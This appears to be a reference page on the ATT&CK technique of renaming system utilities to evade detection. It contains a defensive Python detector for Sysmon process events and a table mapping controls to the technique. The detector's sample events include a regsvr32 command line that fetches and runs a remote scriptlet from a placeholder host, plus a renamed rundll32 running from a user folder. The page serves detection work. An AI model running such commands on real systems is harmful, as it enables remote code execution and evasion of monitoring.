T1036.003 Rename System Utilities Mappings

Adversaries may rename legitimate system utilities to evade security mechanisms that monitor or restrict the use of those utilities. Security monitoring and control mechanisms may be in place for system utilities that adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those mechanisms by renaming the utility prior to use (ex: rename rundll32.exe), since controls keyed on the file name no longer match. (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
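Both variants described above (a renamed utility, and a utility copied elsewhere and renamed) leave a detectable trace in process-creation telemetry: Sysmon Event ID 1 records the executable path (Image) alongside the OriginalFileName read from the PE version resource, and renaming the file on disk does not change the latter. The following is an added example, not code from MITRE ATT&CK or from the mappings project; the watched-utility set, the expected directories, the key=value log format and the sample events are all assumptions constructed for the example.

```python
"""Flag renamed or relocated system utilities in Sysmon process-creation events.

Added example for this page (not code from MITRE ATT&CK or the mappings project).
Sysmon Event ID 1 carries the executable path (Image) and the OriginalFileName
from the PE version resource. Renaming rundll32.exe to update.exe changes Image
but not OriginalFileName, so a mismatch is the signal; a matching name executing
outside its expected directory covers the copy-and-rename case.
"""
from pathlib import PureWindowsPath

# Utilities to watch, keyed by the OriginalFileName in their version resource
# (compared case-insensitively; Windows stores e.g. "RUNDLL32.EXE").
# Illustrative subset (assumption); extend it from the LOLBAS project.
WATCHED_UTILITIES = {
    "rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe",
    "wscript.exe", "cscript.exe", "msiexec.exe", "bitsadmin.exe",
}

# Directories the watched utilities legitimately execute from (assumed list).
# WinSxS is included because the component store holds legitimate copies.
EXPECTED_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\windows\\winsxs\\",
)

# Constructed sample events in a simple key=value|key=value form. Real Sysmon
# data would come from the event log (wevtutil, a SIEM export); use a
# structured export (XML/JSON) there, since command lines may contain '|'.
SAMPLE_EVENTS = [
    "EventId=1|Image=C:\\Windows\\System32\\rundll32.exe|OriginalFileName=RUNDLL32.EXE|CommandLine=rundll32.exe shell32.dll,Control_RunDLL",
    "EventId=1|Image=C:\\Users\\Public\\update.exe|OriginalFileName=RUNDLL32.EXE|CommandLine=update.exe C:\\Users\\Public\\x.dll,Start",
    "EventId=1|Image=C:\\ProgramData\\regsvr32.exe|OriginalFileName=REGSVR32.EXE|CommandLine=regsvr32.exe /s /u /i:http://example.invalid/a.sct scrobj.dll",
    "EventId=1|Image=C:\\Windows\\System32\\notepad.exe|OriginalFileName=NOTEPAD.EXE|CommandLine=notepad.exe",
    "EventId=1|Image=C:\\Temp\\tool.exe|OriginalFileName=-|CommandLine=tool.exe",
]


def parse_event(line: str) -> dict:
    """Split a key=value|key=value line into a dict (values may contain '=')."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def analyze_event(event: dict) -> list:
    """Return a list of findings for one process-creation event ([] if clean)."""
    findings = []
    image = PureWindowsPath(event.get("Image", ""))
    image_name = image.name.lower()
    image_dir = str(image.parent).lower() + "\\"
    original = event.get("OriginalFileName", "-").lower()

    if original in ("", "-", "?"):
        # No version resource (stripped or unsigned binary): nothing to compare.
        # A separate rule on unsigned binaries would cover this case.
        return findings

    if original in WATCHED_UTILITIES:
        if image_name != original:
            findings.append(
                f"renamed utility: {image} carries OriginalFileName {original}")
        if not image_dir.startswith(EXPECTED_DIRS):
            findings.append(
                f"relocated utility: {original} executing from {image_dir}")
    return findings


def scan(lines) -> dict:
    """Run analyze_event over log lines; map 0-based line index -> findings."""
    results = {}
    for idx, line in enumerate(lines):
        found = analyze_event(parse_event(line))
        if found:
            results[idx] = found
    return results


if __name__ == "__main__":
    for idx, found in scan(SAMPLE_EVENTS).items():
        for finding in found:
            print(f"line {idx}: {finding}")
```

On the sample data the second event (update.exe with OriginalFileName RUNDLL32.EXE in a user-writable directory) yields both a renamed and a relocated finding, the third (regsvr32.exe under ProgramData) only a relocated one, and the rest are clean. The comparison is deliberately case-insensitive because the version resource often differs from the on-disk name only in case; a site-specific allowlist is still needed for legitimate products that ship utilities under other names.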


Mappings

Capability ID                            Capability Description                           Mapping Type  ATT&CK ID  ATT&CK Name
AC-2                                     Account Management                               Protects      T1036.003  Rename System Utilities
AC-3                                     Access Enforcement                               Protects      T1036.003  Rename System Utilities
AC-6                                     Least Privilege                                  Protects      T1036.003  Rename System Utilities
CA-7                                     Continuous Monitoring                            Protects      T1036.003  Rename System Utilities
CM-2                                     Baseline Configuration                           Protects      T1036.003  Rename System Utilities
CM-6                                     Configuration Settings                           Protects      T1036.003  Rename System Utilities
SI-3                                     Malicious Code Protection                        Protects      T1036.003  Rename System Utilities
SI-4                                     System Monitoring                                Protects      T1036.003  Rename System Utilities
action.malware.variety.Disable controls  Disable or interfere with security controls      related-to    T1036.003  Masquerading: Rename System Utilities
action.malware.variety.Rootkit           Rootkit (maintain local privileges and stealth)  related-to    T1036.003  Masquerading: Rename System Utilities